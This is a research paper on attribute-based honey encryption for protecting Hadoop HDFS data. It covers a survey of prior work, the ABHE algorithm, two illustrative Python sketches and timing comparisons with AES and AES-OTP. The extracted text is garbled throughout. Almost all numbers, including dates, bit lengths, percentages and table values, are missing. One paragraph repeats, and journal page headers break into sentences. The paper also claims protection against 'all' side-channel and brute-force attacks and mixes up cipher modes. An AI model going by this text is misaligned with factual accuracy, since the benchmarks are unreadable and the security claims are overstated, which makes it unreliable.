towards best data security. in this paper, the author describes big data and its safety issues (tian, ). he also describes existing ways to improve the security of such data, like a security hardening methodology with an attribute relation graph, an attribute selection methodology, a content based access control model and a scalable multidimensional anonymization approach. the author of this paper (tian, ) proposed an intelligent security approach based on real time data collection and threat analytics to detect a threat before the security breach takes place.

hdfs data encryption based on the aria algorithm. in this paper (song et al., ), the authors presented an encryption scheme based on south korea's aria encryption scheme to protect hdfs data in hadoop. the aria algorithm uses a -bit block for data encryption. in this approach, variable length data (not necessarily -bit data) is divided into hdfs blocks. the proposed aria based algorithm provides the same level of data security at the cost of only % performance degradation (during query processing) compared to the aes algorithm. in addition, the researchers explained the future of the aria based encryption scheme in real world applications like location based services and financial data handling.

chaos-based simultaneous compression and encryption for hadoop. this paper (usama & zakari, ) introduced a framework based on a masking pseudorandom key stream to increase the encryption quality and provide robust encryption security and compression during read and write operations when integrated in hdfs. the researchers also proposed a scheme for hadoop using simultaneous compression and encryption to solve the implementation issues. the enhancement consequently improves the speed and efficiency of the algorithm. the proposed algorithm is highly compatible with hadoop and provides efficient encryption security and compression during the storage of data. various experimental results concluded that the performance of a hadoop cluster is reduced when compression and encryption operations are done separately, because both operations need a significant volume of data. the proposed algorithm can compress and encrypt the data simultaneously during mapreduce, which reduces the required data space with minimum network resources. the proposed algorithm passed the edits security analysis test with a % confidence interval. further, all nist sp - tests were passed successfully on cipher text generated from the plaintext.

data encryption based on aes and otp. this research paper (mahmoud, hegazy & khafagy, ) highlighted a method to improve the upload and download time, with a reduction in encrypted file size, using the aes and otp algorithms in hdfs.
the authors performed encryption and decryption in two different ways, based on the aes and aes-otp algorithms. the researchers chose cipher block chaining with the ecb mode of the aes algorithm for handling hdfs blocks, and the otp algorithm is used as a stream cipher, which keeps the length of the plaintext the same. for decryption, a private key is required, which is always in the custody of the user. in this method, when a client requests to transfer a record to hdfs, the application server creates a random key which is then split into keys for multi-stage encryption and decryption using the aes-otp algorithm. moreover, the authors compared the file encryption time among generic hdfs, hdfs encrypted by aes and hdfs encrypted by aes with otp. the results show that the aes with otp algorithm increased the encrypted file size by % of the original file. the researchers also executed parallel decryption processing in the map task to improve performance.

two-layer selective encryption using a key derivation method. in this paper (vimercati et al., ), the authors explained the use of a two-layer selective encryption technique based on a key derivation method to implement the authorization policy (atallah, frikken & blanton, ). in this method, the user assigns a secret key corresponding to each file, which is encrypted using a symmetric key. the owner creates public tokens using his secret key to authorize further users. later, these public tokens, along with the token distribution task, are transferred to the semi-trusted server. to derive the decryption key for a file, a minimal number of secret keys per user and a minimal number of encryption keys are required, since the server cannot derive the decryption key of any file from the available public tokens alone. the file creation and user grant/revocation operations become complex as the number of users increases, which makes the suggested method unscalable (yu et al., a). also, user access privilege accountability is not supported in this method.

security and privacy aspects in mapreduce on clouds. hadoop uses the filters in vigiles (ulusoy et al., ) for a fine grained access control framework. these filters are coded in java by security administrators and handle authorization by means of per-user assignment lists. on the other hand, in guardmr, filters are allocated with limited roles on the basis of subject, and a formal specification approach for the definition of filters is proposed. guardmr and vigiles rely on platform specific features for regulating the execution of a mapreduce task, such as the hadoop apis and the hadoop control flow, and do not need hadoop source code customization. vigiles and guardmr exhibit a practically low implementation overhead; however, they do not provide any support for context aware access control policies (colombo & ferrari, ). in derbeko et al. ( ), the authors considered security and privacy challenges and urgent requirements in the scope of mapreduce and reviewed the existing security and privacy protocols for mapreduce, including accountablemr and trustmr. the study also provides a comparison of several security algorithms, protocols and frameworks for the mapreduce framework.

hybrid storage architecture and efficient mapreduce processing for unstructured data. in this paper (lu et al., ), a technique called hybrid storage architecture is proposed.
with this technique, different kinds of data stores are integrated into the model, which also enables the storage and processing of unstructured data. to execute mapreduce-based batch-processing jobs, various partitioning techniques based on this architecture are applied. the paper also demonstrates how the characteristics of different data stores can be utilized to build a smart and efficient system. the partitioning techniques leverage the unified storage system, thus reducing the i/o cost and improving large-scale data processing efficiency marginally.

towards privacy for mapreduce on hybrid clouds using an information dispersal algorithm. in cheikh, abbes & fedak ( ), to ensure privacy for mapreduce in a hybrid computing environment based on the grid' platform, an information dispersal algorithm is used that covers both untrusted infrastructures (such as desktop grids and public clouds) and trusted infrastructures (such as private clouds).

semrod: secure and efficient mapreduce over hybrid clouds. semrod (oktay et al., ) first segregates the data into sensitive and non-sensitive groups and then sends the non-sensitive data to public clouds. private and public clouds execute the map phase. however, the private cloud pulls all the outputs, including the outputs of the map phase containing sensitive keys, and executes the reduce phase operation only on records associated with sensitive keys, ignoring the non-sensitive keys. on the other hand, the public cloud executes the reduce phase on all outputs without knowing the sensitive keys. finally, a sensitive key result is generated by removing the duplicate entries with the help of a filtering step.

mtmr: ensuring mapreduce computation integrity with merkle tree-based verification. the proposed mtmr (wang et al., ) is a method based on merkle tree based verification to ensure the integrity of mapreduce tasks. it performs two rounds of merkle tree based verification for the pre-reduction and restoration phases and covers mapreduce in a hybrid cloud environment. in each round, mtmr samples a small portion of the reduce task input/output records on the private cloud and then applies the merkle tree-based verification. the authors believe that mtmr can significantly improve integrity while incurring moderate performance overhead.

security threats to hadoop: data leakage attacks and investigation. this article (fu et al., ) presents an automatic analysis method to find data leakage attacks in hadoop. it also presents a forensic framework including an on-demand data collection method, in which data is collected from the machines in the hadoop cluster on the forensic server and then analyzed. it can detect suspicious data leakage behaviors and give warnings and evidence to users using its automatic detection algorithm, and the collected evidence can help to find the attackers and reconstruct the attack scenarios. the authors also discuss the security concerns of hdfs (and hadoop) and present some possible data leakage attacks on it.

vc and m r in mapreduce computation. vc (schuster et al., ) uses sgx to achieve confidentiality and integrity as part of the mapreduce programming model and requires trusted hardware to perform the computation. vc is not allowed to perform system calls but works within and follows the executor interface of hadoop. on the other hand, m r (dinh et al., ) offers mechanisms for reducing network traffic analysis leakage for mapreduce jobs.

preserving secret shared computations using mapreduce. the main reason for cloud insecurity is the loss of control over the data, which can cause serious harm to the confidentiality of customers using cloud computing. this problem can be overcome by providing a secure computing environment and data storage (sudhakar, farquad & narshimha, ). also, techniques like encrypted representation and secret sharing have emerged that offer verified security along with relatively efficient processing, but are limited to computing only selection queries (dolev et al., ).
on the other hand, m r (dinh et al., ) offer mechanisms for dropping network traffic analysis leakage for mapreduce jobs. preserving secret shared computations using mapreduce. the main reason of cloud insecurity is the loss of control over the data which can cause serious harm to the confidentiality of customer using cloud-computing. this problem can be overcome by providing secure computing environment and data storage (sudhakar, farquad & narshimha, ). also, techniques like encrypted representation and secret sharing techniques have emerged that offer verified security along with relatively efficient processing but are limited to only computing selection queries (dolev et al., ). kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. privacy preservation techniques in big data analytics. in this paper (mohan rao, krishna & kumar, ), authors have described about the various privacy threats and preservation techniques and models along with their limitations. the authors also proposed a data lake based method for privacy preservation of unstructured data. data lake is a repository to store raw format of the data either structured or unstructured, coming from different sources. apache flume is used for data ingestion from different sources and for their processing; data is transformed to hive tables. also, hadoop mapreduce using machine learning or vertically distributed can be applied to classify sensitive attributes of data whereas tokenization is used to map the vertically distributed data. major findings from the literature after a cautious and focused study of various methodologies/approaches on big data and hadoop security, the following observations have been made: • hadoop stores the data on multiple nodes in a distributed manner while metadata and edit logs are stored on name nodes. the communication of data happens between client node and data node. hence, multiple nodes are used in the hadoop framework. the data is vulnerable to the hacks during the transmission, as it is not encrypted by default. various communication protocols are used for internode communication. the available approaches or solutions for securing the data transmission include kerberos, simple authentication and security layer (sasl), etc. however, these traditional approaches are not effective and sufficient enough to secure big data. • data that is stored in fixed storage is known as data at rest or at storage level. initially the stored data is prone to security attacks being not encrypted. since, hadoop works on the principal of spreading data across multiple nodes, consequently it is exposed to all insecure entry points. there are numerous methods available for data encryption in hadoop. as hadoop deals with large volume of data, it takes time in the encryption/decryption process. in order to maintain the performance, it is important to use an encryption technique that is fast enough to encrypt/decrypt. according to the studies, the encrypted data increases in the size almost by one and half time of the original data so the file upload time also gets affected. • cloud providers need to design a cost-effective infrastructure that understands customers’ needs at all levels. to meet the requirements, it is needed to share the storage devices amongst the multiple users, which is known as multi-tendency. but sharing of resources results in security vulnerability. 
if proper security measures are not implemented, an attacker can easily gain access to the customer's data, even more so when the same physical device is shared.
• companies would never know whether their data is being used by someone else or not, because they do not have direct control over the data. the lack of resource monitoring mechanisms creates many security issues.
• customers have to rely upon a trust mechanism as an alternate security measure, in which they control their data and resources. cloud providers also provide customers with certificates of operation as a secure provider; the certificates are authenticated against established standards.
• the security capabilities that exist for ''non big data'' are needed for big data as well, to ensure client verification and the management of data masking and encryption.

materials & methods

data encryption based on attribute based honey encryption (abhe)

in hadoop, the inherent security features are simple file permissions and access control mechanisms. in this context, encryption is the best technology for securing the hdfs files stored in datanodes, as well as for files transferred among datanodes while processing mapreduce jobs. cryptography can be used for data protection in hadoop; data confidentiality and data integrity can be achieved using encryption techniques. cryptographic keys can be categorised into secret key cryptography and public key cryptography. public key cryptography is known as asymmetric key cryptography (dyer et al., ), while secret key cryptography is symmetric cryptography, which is used in stream ciphers for password based encryption (vinayak & nahala, ).

encryption is mainly used to ensure secrecy. encryption literally means secret writing, which was initially used by ancient humans desiring to store secrets. in the past, encryption was available only to generals and emperors, but today it is used by nearly everyone, every day, whenever a credit card transaction, data storage or node to node communication is performed, a phone call is made, or a secure website is used. the efficacy of an encryption algorithm depends on the key length (ebrahim, khan & khalid, ). the available encryption algorithms are considered to be secure, but, depending on the time and computing power available, they are also susceptible to intrusions (yin, lska & zhou, ). present encryption techniques are also beset with a vulnerability: when decrypting with a wrongly guessed key, they yield an invalid looking plaintext message, while decrypting with the right key gives a valid-looking plaintext message, confirming to the attacker that the cipher-text has been correctly decrypted (yin, lska & zhou, ). in this context, honey encryption was proposed by juels and ristenpart (juels & ristenpart, ). it is a concept which addresses the vulnerability discussed above and makes password based encryption (pbe) more difficult to break by brute force. traditional encryption methods show random, meaningless text when decryption is done with a wrong key, thereby confirming its invalidity. on the contrary, honey encryption shows plausible looking text even when the key is wrong, so the attacker cannot know whether the guessed key is the right one. a toy sketch of this decoy behaviour is given below.
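the following toy sketch illustrates the honey-encryption idea described above; it is not the authors' scheme and not production cryptography. the message space, the pin format and all names are illustrative assumptions: the point is only that decryption with any password yields a plausible-looking message rather than gibberish.

```python
# toy illustration of the honey-encryption idea: the message space is the set of
# plausible 4-digit pins, a password-derived pseudorandom offset maps the real pin
# to a "seed", and decryption with *any* password returns some plausible pin.
import hashlib, hmac

MESSAGE_SPACE = [f"{i:04d}" for i in range(10000)]   # all plausible 4-digit pins

def _offset(password: str, salt: bytes) -> int:
    digest = hmac.new(password.encode(), salt, hashlib.sha256).digest()
    return int.from_bytes(digest, "big") % len(MESSAGE_SPACE)

def encrypt(pin: str, password: str, salt: bytes = b"demo-salt") -> int:
    # the "ciphertext" here is simply the seed obtained by shifting the message index
    return (MESSAGE_SPACE.index(pin) + _offset(password, salt)) % len(MESSAGE_SPACE)

def decrypt(seed: int, password: str, salt: bytes = b"demo-salt") -> str:
    return MESSAGE_SPACE[(seed - _offset(password, salt)) % len(MESSAGE_SPACE)]

ct = encrypt("4261", "correct horse")
print(decrypt(ct, "correct horse"))   # -> 4261 (the real pin)
print(decrypt(ct, "wrong guess"))     # -> some other plausible pin, not gibberish
```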
this unique approach slows down the attacker by deceiving him and increases the complexity of password guessing and cracking. a few other technologies share the same term ''honey''. for example, honeywords (juels & ristenpart, ) are passwords used as decoys which generate an alert and notify the administrator if used. honeypots (owezarski, ), honeynets (kim & kim, ), and honeyfarms (jain & sardana, ) are other examples of luring systems. honey encryption is related to format-preserving encryption (fpe) (bellare et al., ) and format-transforming encryption (fte) (dyer et al., ). in fpe, the plaintext and cipher-text message spaces are the same, whereas this is not the case in fte. in honey encryption, the messages are mapped to a seed range in the seed space. the seed space and message space are different, so the cipher-text message space differs from the message space. vinayak & nahala ( ) used the he scheme in manets to secure ad-hoc networks against brute force attacks. tyagi et al. ( ) applied the he technique to protect simple text messages and credit card numbers that are susceptible to brute force attacks. choi, nam & hur ( ) proposed schemes to solve human typo problems with message recovery security: a legitimate user may be confused on seeing a result different from the expected one if there was a mistake in typing the password. edwin mok et al. (tan & samsudin, ) came up with an extended honey encryption (xhe) scheme by adding additional security measures on the encrypted data. however, honey encryption is still difficult to apply in certain applications. for example, if the attacker has some clue about the data which is encrypted, say a part of the original data, he can easily tell which result is bogus and which is the correct data by matching that part with the decrypted result. it is thus possible to brute force honey encryption if the attacker has a crib that must match to confirm legitimacy (wikipedia, ). honey encryption is therefore still vulnerable, and further research is ongoing; to overcome its limitations it must be extended with new security methods. this persuaded the authors of this paper to develop an in-depth understanding of data security and privacy in order to solve issues related to honey encryption. this paper aims to fix the vulnerabilities in honey encryption and make it more secure. the authors have designed and implemented attribute based honey encryption as an extension of public key encryption. this enables users to encrypt and decrypt messages based on user attributes: only if the user matches the predefined attributes will the user be able to decrypt the message. it also helps to keep attackers away by blacklisting them.

proposed encryption algorithm

the proposed encryption algorithm is a more secure version of honey encryption. the algorithm provides two tiers of security so that it can overcome the limitations prevailing in existing encryption techniques. the proposed algorithm is termed attribute-based honey encryption (abhe). its / bit encryption algorithm performs two layers of encryption in order to enhance security and effectiveness. the use of ciphertext policy attribute based encryption (cp-abe) (zhao, wei & zhang, ; varsha & suryateja, ; shobha & nickolas, ) is proposed in the algorithm; a minimal sketch of the resulting two-tier flow is given below, and the detailed workflow follows it.
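the sketch below is a schematic illustration of the two-tier flow described in the text, not the authors' implementation: real cp-abe relies on pairing-based cryptography, which is replaced here by a hash over the attributes that satisfy the policy, and the password tier returns decoy honey words on a wrong guess. the fernet cipher, the policy, and all names are illustrative assumptions.

```python
# schematic two-tier abhe-style flow: (1) an attribute-policy gate on the file key,
# (2) a password layer that shows decoy "honey words" to intruders.
import base64, hashlib, secrets
from cryptography.fernet import Fernet, InvalidToken

POLICY = {"dept:finance", "role:analyst"}             # attributes required to decrypt
HONEY_WORDS = ["river-otter-42", "blue-harbor-17"]    # plausible decoys for intruders

def attribute_key(attributes: set) -> bytes:
    """derive a symmetric key only from the attributes named in the policy."""
    material = ",".join(sorted(POLICY & attributes)).encode()
    return base64.urlsafe_b64encode(hashlib.sha256(material).digest())

def encrypt(plaintext: bytes, attributes: set, password: str) -> dict:
    token = Fernet(attribute_key(attributes)).encrypt(plaintext)
    return {"ct": token, "pw": hashlib.sha256(password.encode()).hexdigest()}

def decrypt(package: dict, attributes: set, password: str):
    if hashlib.sha256(password.encode()).hexdigest() != package["pw"]:
        return secrets.choice(HONEY_WORDS)            # intruder sees a decoy, not an error
    try:
        return Fernet(attribute_key(attributes)).decrypt(package["ct"])
    except InvalidToken:
        return None                                   # attributes do not satisfy the policy

pkg = encrypt(b"quarterly ledger", {"dept:finance", "role:analyst"}, "s3cret")
print(decrypt(pkg, {"dept:finance", "role:analyst"}, "s3cret"))   # b'quarterly ledger'
print(decrypt(pkg, {"dept:finance", "role:analyst"}, "guess"))    # a honey word
print(decrypt(pkg, {"role:intern"}, "s3cret"))                    # None: policy not met
```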
in the algorithm user’s private-key is superimposed with an access policy over a set of attributes within the system. a user can decrypt a cipher text only if his attributes satisfy the set of rules of the respective cipher-text. firstly, a set of attributes are chosen from the file to be encrypted; then a set of rules/policies are created for these attributes. on the basis of these rules, the given file is encrypted. further, for more security the encrypted file is again protected by password. as this password is based on honey encryption, it creates a set of honey words. the encrypted file is passed on and may be received by different users. now according to the kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proposed algorithm, only the user having the desired set of attributes or the password would be able to decrypt the data. if someone wants to decrypt the encrypted file, he/she will have to enter the correct password. if password does not match, the user will be treated as intruder and previously set honey words will be displayed to him. if the password matches, the genuine user has to enter the private key which has been already created while encrypting the file. again, if private key does not match, the user will not be allowed to access the file. on matching, the user will be able to successfully decrypt the file. the overall process will provide better security for files. abhe algorithm for data security input: plain text file output: encrypted file step : generate private key step .a: set of attributes is specified that describe the key. step .b: output private key ‘q’ step : encryption:(the algorithm encrypts file ‘f’ with policy ‘p’ and outputs the cipher-text) step .a: selects the file to be encrypted and set of attributes. step .b: encrypt a file f using a set of attributes occurring in the policy ‘p’ step .c: generate cipher-text ct step : encrypted file (in step- ) is protected again by the password step : generate honey words and present it to user. step : decryption: (decryption algorithm gets as input an encrypted file which is protected by the password. cipher-text ct is produced by the encrypted algorithm, an access policy ‘p’ under which ct was encrypted.) step .a: input is encrypted file step .b: enter the password; if password matches, the cipher text ct is decrypted, otherwise intruder is detected. step .c: user applies y number of attributes to compute private key step .d: if key matches, file is decrypted and output the corresponding original file ‘f’, otherwise it outputs null. authors have introduced a method to enhance the security level in which the data encryption and key management server are put together and provided a unique key for each application or cluster with hdfs encryption. when hdfs encrypted file entering into the apache hadoop environment, it remains in encrypted form at storage after processing. the results including intermediate results are always stored in encrypted form within the cluster in a file system having non hdfs form. at client level, data has been divided into smaller chunks by using parallel computing technique and stored at hdfs in encrypted form. also, the map reduce tasks can be done on encrypted data directly and decrypt before processing after importing the corresponding decryption library. input to a mapreduce job is divided into fixed-size pieces. these are the input splits which is a chunk of the input that is consumed by a single map. 
at map function, the input data is kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. processed in decrypted form and stored output data in encrypted form into the hdfs. the reduce function is executed on the intermediate results of map function after decryption and the stored final output data in again encrypted form into the hdfs and provided access to the authorized clients only. decryption process is replica of encryption process and both these methods are simple, cost-effective and scalable without deteriorating the performance, scalability or functionality. so, they are easy to recommend and effectively address the security deficiencies with big data clusters. evaluation of performance of the proposed algorithm has also been done. the performance parameter includes encryption–decryption time (rate of encryption is given by encryption time and rate of decryption is given by decryption time), throughput of encryption-decryption where throughput is calculated as the size of plain text (in mb or gb) is divided by the total time during encryption-decryption. the speed and power conumption of encryption-decryption process are mainly dependent on the throughput of the encryption-decryption scheme, as it defines the speed of encryption-decryption. in case of encryption-decryption, as the throughput increases, power consumption decreases. also, authors have compared results with the exsisting hdfs encryption algorithms namely aes and aes-otp with different file sizes (varies from mb to gb). the performance parameters results have shown that the proposed abhe scheme with hadoop environment is a considerable improvement over aes, aes with otp (integrating with hadoop). also, the proposed algorithm provides the security for data stored at hdfs and distributed computing against all side channel attacks, brute force attacks and collusion attacks. detailed description is given in the next section. results implementation aes is propositioned to be better than the other secure approaches that address the secure data processing using hadoop hdfs and mapreduce job in context of data encryption. to support this claim, the performance of proposed abhe algorithm has been evaluated in this section and performance of the proposed abhe algorithm has been compared with the existing algorithms, i.e., aes and aes-otp, while doing the same experiment in a standard hadoop setup. the performance is evaluated in terms of throughput and power ponsumption by doing the encryption-decryption techniques on different sizes of files (size varies from mb to gb). implementation environment the implementations and experiments are based on hadoop cluster. the hadoop cluster consists of one host which runs on laptop with intel core i - m processor . ghz with turbo boost upto . ghz and gb ram. in this, one of the host is tagged as namenode and other is used as a datanode. namenode playsa role of centre point in cluster and all information about the stored data is saved on it. for simplicity, there is only one namenode and one datanode in a hadoop cluster with one run. datanode provides the physical space for storing data. the operating system of the host is linux with centos . , ubuntu- . (gnu/ linux . . - -generic x - ). on top of the operating kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. system is hadoop with version . . . 
single node architecture of hadoop is used in which all components of the hadoop are on the same node. implementation and stand-alone applications are written in java. as hadoop requires jdk for its working so, java open java development kit (jdk) is installed on the system using the <apt-get>command. the running component of the hadoop can be checked using the <jps>command. hdfs distribution process overcomes outages, acts as a backup while maximising the availability of the services. results of the experiment in this section, we present the results and analysis of our proposed algorithm versus the available securing approaches. in the proposed encryption technique, at first, we apply the attribute based encryption which is based on cipher text policy based attribute encryption. the proposed approach uses a specific type of encrypted access control wherein user’s private-key is super imposed with an access policy over a set of attributes within the system. a user can decrypt a cipher text only if his attributes satisfy the set of rules of the respective cipher-text. an enhance security to ensure full safety against all side channel & brute force attack, the proposed algorithm is combined with honey encryption algorithm. the combination of these two algorithms, i.e., the abhe provides a stronger security against confidentially & brute force attack and all side channel as well as collusion attacks as encryption is not easy to break and get the actual data. the performance of abhe has been calculated in terms of file size, encryption time, decryption time and power consumption and compared with two existing encryption algorithms namely; aes and aes with otp applying on different sizes of text files. the working of the proposed algorithm has been demonstrated in figs. and . file size the proposed encryption algorithm reduces the encryption-decryption time without affecting the size of original file. here, the file named mb.txt is of size . gb and contains blocks starting from to . the size of block to block is remains unchanged after encryption while size of block is changed from bytes to byte which is insignificant and shown in figs. – . also, the output file size when encrypted a file of size gb using aes, aes-otp and the proposed approach is compared which is shown in table . encryption time using abhe this is the time taken by encryption algorithm to produce a cipher-text from plain-text. encryption is performed while writing the file on hadoop so that the stored data can be saved from various attacks. this process involves a number of steps which has been shown as follows: i. hdfs client interacts with namenode by calling the create() function on distributed file system (dfs). ii. dfs sends a request to namenode to create a new file. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure working of the proposed abhe encryption algorithm when attribute and password are en- tered for mb file size (for both encryption and decryption). full-size doi: . /peerjcs. /fig- figure working of proposed abhe encryption algorithm when right and wrong password are en- tered for mb file size. full-size doi: . /peerjcs. /fig- iii. namenodes provide address of the datanode, i.e., slave which is based on the availability of space and capacity in datanode on which hdfs client is going to start writing encrypted data. iv. the hdfs client starts entering the attributes to encrypt the file. 
after that for more security, it applies the password which is based on honey encryption. now the hdfs client starts writing data though fs data outputstream to specific slave for a specified block. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size block one before encryption. full-size doi: . /peerjcs. /fig- v. the slave starts copying the block to another slave when hdfs client has finished writing the blocks. vi. during the block copying and replication process, metadata of the file is updated in the namenode by datanode. (datanode provides the periodically heartbeat signal to the namenode). vii. after the successful completion of write operation,datanode sends the acknowledge- ment to hdfs client through dfs. viii. after that hdfs client closes the process. ix. write operation is closed after receiving the acknowledgement from hdfs client. the complete operation (with above steps i.e., i, ii, iii...) is explained in fig. . as shown in table , it took . min for the encrypted hdfs using aes algorithm, whereas it took . min for the encrypted hdfs using aes with otp algorithm. on the other hand, the proposed approach took only . min to encrypt gb file in hdfs as shown in table . data decryption time using abhe it is the time taken by decryption approach abhe to produce the plain-text from cipher- text. with our proposed cryptographic scheme, whenever a node will try to read a file on hdfs it will first have to decrypt the file. then only it will be allowed to perform reads operation. this has been done in the proposed approach to filter out the intruders or unauthorized access. following is the step-by-step process on how read operation is performed in hdfs with the proposed approach: i. first of all hdfs client interacts with namenode by calling the read function on distributed file system (dfs). kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size of block one after encryption. full-size doi: . /peerjcs. /fig- figure size of block eight before encryption. full-size doi: . /peerjcs. /fig- ii. dfs sends a request to namenode for reading a file. iii. namenode provides address of the datanode, i.e., slave on which hdfs client will start reading the data. iv. for hdfs client to start reading data through fs data inputstream from specified slave and from a specified block, firstly it has to enter the correct password. if password does not match, the user will be treated as an intruder. if the password matches, the genuine user has to enter the private key which has already been created while encrypting the file. again, if private key does not match, the user will not be allowed to access the file. on matching, the user will be able to successfully decrypt the file. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size of block eight after encryption. full-size doi: . /peerjcs. /fig- table file size comparison among aes and aes with otp algorithms and the proposed abhe algo- rithm. file size (mb) aes algorithm (mb) aes with otp algorithm (mb) proposed abhe algorithm (mb) . . . . . . . . , , , . , v. after a successful completion of read operation, hdfs client terminates read operation. vi. 
read operation is closed after receiving the acknowledgement from hdfs client. vii. as it has been shown in step , the proposed approach provides dual layer security to the data stored in hdfs. step-wise demonstration of decryption operation is shown in fig. . when using the proposed approach for decryption of gb file on mapper job, it took . min. on the other hand, the existing algorithms, i.e., aes and aes with otp respectively to . and . , respectively for decrypting gb file as shown in table . the values for each criterion was logged and graphically plotted to represent the results as shown in figs. and . further, these figures show the comparative time taken (in minutes) during the encryption and decryption process by different algorithms i.e., aes, aes with otp and proposed algorithm (abhe). from figs. and , it is clear that the kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure writing a file with encryption in hdfs. full-size doi: . /peerjcs. /fig- table file encryption performance comparison among aes and aes with otp algorithms and the proposed abhe algorithm. file size (mb) aes algorithm (minutes) aes with otp algorithm (minutes) proposed abhe algorithm (minutes) . . . . . . . . . . . . , . . . total encryption time . . . throughput of encryption (mb/minutes) . . . proposed algorithm is taking less time for encryption and decryption as compared to other existing algorithms in hadoop environment. when the proposed abhe algorithm is integrated with hadoop, it showed better performance than the previously available cryptographic algorithm. from the results of tables – , it is clear that: • the proposed algorithm abhe is taking less time to encrypt and decrypt text files than the aes, aes with otp algorithms. • the throughput of abhe is very high as compared to the aes, aes with otp algorithms. • as the throughput increases, the power consumption decreases, hence the power consumption of abhe is low than that of the aes, aes with otp. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure reading a file with decryption in hdfs. full-size doi: . /peerjcs. /fig- table file decryption performance comparison among aes and aes with otp algorithm and the proposed abhe algorithm. file size (mb) aes algorithm (minutes) aes with otp algorithm (minutes) proposed abhe algorithm (minutes) . . . . . . . . . . . . , . . . total decryption time . . . throughput of decryption (mb/minutes) . . . furthermore, for analyzing the performance of the proposed encryption technique with sharing data between two different datanodes in hadoop environment, the same has been simulated with random text file size mb (in terms of block size) before and after encryption shown in figs. and . also, the browse directory show that encrypted file and abc.txt non-encrypted file hdfs in fig. . discussion the proposed study has been able to successfully solve the weaknesses present in the security approaches available for big data security. the significance of the proposed work is as follows: kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure encryption time (minutes) of aes, aes with otp and proposed abhe algorithm. full-size doi: . /peerjcs. /fig- figure decryption time (minutes) of aes, aes with otp and proposed abhe algorithm. 
full-size doi: . /peerjcs. /fig- • proposed encryption technique which uses the concept of attributes based honey encryption (abhe) may help to securing sensitive information stored at hdfs in insecure environment such as the internet and cloud storages. • proposed technique provides both hdfs and map reduce computation in the hadoop as well as cloud environment to secure and preserve the integrity of data during execution kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure size of block five before encryption. full-size doi: . /peerjcs. /fig- figure size of block five after encryption. full-size doi: . /peerjcs. /fig- or at rest. therefore, we have directed our efforts in securing the data transfer and computation paradigm in hadoop environment by using chipper text policy attributes based honey encryption and honey encryption for secret share of tuple of data and sent them to the cloud in a secure manner. • the chipper text policy attributes based encryption makes the application secure and has a high performance when compared with the rest of the encryption techniques. also, it provides the secure data transfer to all cloud applications. kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure browse directory show that encrypted file and abc.txt non-encrypted file hdfs. full-size doi: . /peerjcs. /fig- • in the proposed algorithm, we have assured the data security by using simplified chipper text policy attribute based encryption with honey encryption which is difficult to decrypt by any unauthorized access. • the user authorization access is based on the user define policy which reflects the overall organizational structure and also, depends upon a set of attributes within the system. • with the proposed algorithm, the security of data is not only dependent on the secrecy of encryption algorithm but also on the security of the key. this provides dual layer security for the data. conclusion in this proposed approach, we mainly concentrated on protection of big data stored in hdfs by integrating the proposed abhe algorithm with hadoop key management server. in a nutshell, for ensuring data security in hadoop environment through the proposed encryption technique, hdfs files are encrypted by using attribute based honey encryption through the proposed abhe algorithm. for evaluating the suggested technique, we carried out some experiments using two data nodes. our objective was to experiment and gauge the effectiveness of abhe algorithm. for accuracy in sharing secret key, data sharing between different clients and speed with which each file stored in hdfs. as the proposed abhe algorithm, execution time (a function of encryption time) is less as compared to the other available approaches. this proves that the proposed technique is fast enough to secure the data without adding delay. also, the proposed abhe algorithm has a higher throughput which proves its applicability on big data. it provides a feasible solution for secure communication between one datanode to other datanode. the proposed encryption technique does not increase the file size therefore it saves the memory and bandwidth, and hence reduces traffic in a network. also, it has an ability to encrypt kapil et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. structured as well as unstructured data under a single platform. only hdfs client can encrypt or decrypt data with accurate attributes and password. the proposed technique provides a dual layer security for all datanode as data is not confined to a specific device and clients can access the system and data from anywhere. this encryption approach may be reckoned as a premise for visualizing and designing even more robust approaches to ensure optimum security of big data. additional information and declarations funding this work is sponsored by council of science & technology, uttar pradesh, india under f. no. cst/d- . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: council of science & technology, uttar pradesh, india. competing interests the authors declare there are no competing interests. author contributions • gayatri kapil conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • alka agrawal conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • abdulaziz attaallah conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • abdullah algarni performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved 